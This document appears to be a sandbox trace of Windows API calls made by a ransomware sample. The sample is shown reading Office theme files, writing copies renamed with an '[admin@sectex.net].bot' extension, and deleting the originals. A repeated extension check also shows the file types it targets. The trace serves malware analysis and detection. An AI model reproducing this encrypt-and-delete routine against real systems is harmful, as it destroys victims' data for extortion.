	[0141.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.635] GetLastError () returned 0x0
	[0141.635] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x825e4, lpOverlapped=0x0) returned 1
	[0141.648] WriteFile (in: hFile=0x3b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x825f0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x825f0, lpOverlapped=0x0) returned 1
	[0141.658] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.658] WriteFile (in: hFile=0x3b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0141.658] SetEndOfFile (hFile=0x3b8) returned 1
	[0141.658] CloseHandle (hObject=0x3b8) returned 1
	[0141.658] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.658] SetEndOfFile (hFile=0x31c) returned 1
	[0141.670] CloseHandle (hObject=0x31c) returned 1
	[0141.670] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.670] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx")) returned 1
	[0141.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.853] lstrlenW (lpString=".doc") returned 4
	[0141.853] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.853] lstrlenW (lpString=".docx") returned 5
	[0141.853] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.853] lstrlenW (lpString=".pdf") returned 4
	[0141.853] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.853] lstrlenW (lpString=".xls") returned 4
	[0141.853] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.853] lstrlenW (lpString=".xlsx") returned 5
	[0141.853] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.853] lstrlenW (lpString=".ppt") returned 4
	[0141.853] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.853] lstrlenW (lpString=".zip") returned 4
	[0141.853] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.853] lstrlenW (lpString=".rar") returned 4
	[0141.853] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.853] lstrlenW (lpString=".bz2") returned 4
	[0141.853] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.853] lstrlenW (lpString=".7z") returned 3
	[0141.853] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.853] lstrlenW (lpString=".dbf") returned 4
	[0141.853] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.853] lstrlenW (lpString=".1cd") returned 4
	[0141.853] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.853] lstrlenW (lpString=".jpg") returned 4
	[0141.853] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.854] lstrlenW (lpString=".doc") returned 4
	[0141.854] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.854] lstrlenW (lpString=".docx") returned 5
	[0141.854] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.854] lstrlenW (lpString=".pdf") returned 4
	[0141.854] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.854] lstrlenW (lpString=".xls") returned 4
	[0141.854] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.854] lstrlenW (lpString=".xlsx") returned 5
	[0141.854] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.854] lstrlenW (lpString=".ppt") returned 4
	[0141.854] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.854] lstrlenW (lpString=".zip") returned 4
	[0141.854] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.854] lstrlenW (lpString=".rar") returned 4
	[0141.854] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.854] lstrlenW (lpString=".bz2") returned 4
	[0141.854] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.854] lstrlenW (lpString=".7z") returned 3
	[0141.854] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.854] lstrlenW (lpString=".dbf") returned 4
	[0141.854] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.854] lstrlenW (lpString=".1cd") returned 4
	[0141.854] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81
	[0141.854] lstrlenW (lpString=".jpg") returned 4
	[0141.854] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.855] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.855] lstrlenW (lpString="Foundry.eftx") returned 12
	[0141.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0141.887] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=18226) returned 1
	[0141.887] CloseHandle (hObject=0x3c0) returned 1
	[0141.888] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx")) returned 0x20
	[0141.888] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0141.888] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.888] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.889] GetLastError () returned 0x0
	[0141.889] ReadFile (in: hFile=0x3c0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x4732, lpOverlapped=0x0) returned 1
	[0141.939] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x4740, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x4740, lpOverlapped=0x0) returned 1
	[0141.940] ReadFile (in: hFile=0x3c0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.940] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.940] SetEndOfFile (hFile=0x384) returned 1
	[0141.940] CloseHandle (hObject=0x384) returned 1
	[0141.940] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.940] SetEndOfFile (hFile=0x3c0) returned 1
	[0141.943] CloseHandle (hObject=0x3c0) returned 1
	[0141.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.947] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx")) returned 1
	[0141.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.968] lstrlenW (lpString=".doc") returned 4
	[0141.968] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.968] lstrlenW (lpString=".docx") returned 5
	[0141.968] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.968] lstrlenW (lpString=".pdf") returned 4
	[0141.968] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.968] lstrlenW (lpString=".xls") returned 4
	[0141.968] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.968] lstrlenW (lpString=".xlsx") returned 5
	[0141.968] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.968] lstrlenW (lpString=".ppt") returned 4
	[0141.968] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.968] lstrlenW (lpString=".zip") returned 4
	[0141.968] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.968] lstrlenW (lpString=".rar") returned 4
	[0141.968] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.968] lstrlenW (lpString=".bz2") returned 4
	[0141.968] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.968] lstrlenW (lpString=".7z") returned 3
	[0141.968] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.968] lstrlenW (lpString=".dbf") returned 4
	[0141.968] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.968] lstrlenW (lpString=".1cd") returned 4
	[0141.968] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.968] lstrlenW (lpString=".jpg") returned 4
	[0141.968] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.969] lstrlenW (lpString=".doc") returned 4
	[0141.969] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0141.969] lstrlenW (lpString=".docx") returned 5
	[0141.969] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0141.969] lstrlenW (lpString=".pdf") returned 4
	[0141.969] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0141.969] lstrlenW (lpString=".xls") returned 4
	[0141.969] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0141.969] lstrlenW (lpString=".xlsx") returned 5
	[0141.969] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0141.969] lstrlenW (lpString=".ppt") returned 4
	[0141.969] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0141.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.969] lstrlenW (lpString=".zip") returned 4
	[0141.969] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0141.969] lstrlenW (lpString=".rar") returned 4
	[0141.969] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0141.969] lstrlenW (lpString=".bz2") returned 4
	[0141.969] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0141.969] lstrlenW (lpString=".7z") returned 3
	[0141.969] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0141.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.969] lstrlenW (lpString=".dbf") returned 4
	[0141.969] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0141.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.969] lstrlenW (lpString=".1cd") returned 4
	[0141.969] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0141.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned 79
	[0141.969] lstrlenW (lpString=".jpg") returned 4
	[0141.969] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0141.970] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.970] lstrlenW (lpString="Horizon.eftx") returned 12
	[0141.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.982] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=211090) returned 1
	[0141.982] CloseHandle (hObject=0x384) returned 1
	[0141.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx")) returned 0x20
	[0141.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.982] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.983] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.983] GetLastError () returned 0x0
	[0141.983] ReadFile (in: hFile=0x384, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x33892, lpOverlapped=0x0) returned 1
	[0141.989] WriteFile (in: hFile=0x3a8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x338a0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x338a0, lpOverlapped=0x0) returned 1
	[0141.993] ReadFile (in: hFile=0x384, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.993] WriteFile (in: hFile=0x3a8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.993] SetEndOfFile (hFile=0x3a8) returned 1
	[0141.993] CloseHandle (hObject=0x3a8) returned 1
	[0141.993] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.993] SetEndOfFile (hFile=0x384) returned 1
	[0142.019] CloseHandle (hObject=0x384) returned 1
	[0142.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.019] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx")) returned 1
	[0142.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.020] lstrlenW (lpString=".doc") returned 4
	[0142.020] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.020] lstrlenW (lpString=".docx") returned 5
	[0142.020] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.020] lstrlenW (lpString=".pdf") returned 4
	[0142.020] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.020] lstrlenW (lpString=".xls") returned 4
	[0142.020] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.020] lstrlenW (lpString=".xlsx") returned 5
	[0142.020] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.020] lstrlenW (lpString=".ppt") returned 4
	[0142.020] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.020] lstrlenW (lpString=".zip") returned 4
	[0142.020] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.020] lstrlenW (lpString=".rar") returned 4
	[0142.020] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.020] lstrlenW (lpString=".bz2") returned 4
	[0142.020] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.020] lstrlenW (lpString=".7z") returned 3
	[0142.020] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.020] lstrlenW (lpString=".dbf") returned 4
	[0142.020] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.020] lstrlenW (lpString=".1cd") returned 4
	[0142.020] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.020] lstrlenW (lpString=".jpg") returned 4
	[0142.020] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.020] lstrlenW (lpString=".doc") returned 4
	[0142.021] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.021] lstrlenW (lpString=".docx") returned 5
	[0142.021] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.021] lstrlenW (lpString=".pdf") returned 4
	[0142.021] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.021] lstrlenW (lpString=".xls") returned 4
	[0142.021] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.021] lstrlenW (lpString=".xlsx") returned 5
	[0142.021] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.021] lstrlenW (lpString=".ppt") returned 4
	[0142.021] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.021] lstrlenW (lpString=".zip") returned 4
	[0142.021] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.021] lstrlenW (lpString=".rar") returned 4
	[0142.021] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.021] lstrlenW (lpString=".bz2") returned 4
	[0142.021] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.021] lstrlenW (lpString=".7z") returned 3
	[0142.021] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.021] lstrlenW (lpString=".dbf") returned 4
	[0142.021] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.021] lstrlenW (lpString=".1cd") returned 4
	[0142.021] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79
	[0142.021] lstrlenW (lpString=".jpg") returned 4
	[0142.021] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.021] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.022] lstrlenW (lpString="Module.eftx") returned 11
	[0142.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0142.027] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=43357) returned 1
	[0142.037] CloseHandle (hObject=0x3c4) returned 1
	[0142.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx")) returned 0x20
	[0142.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0142.061] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.061] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
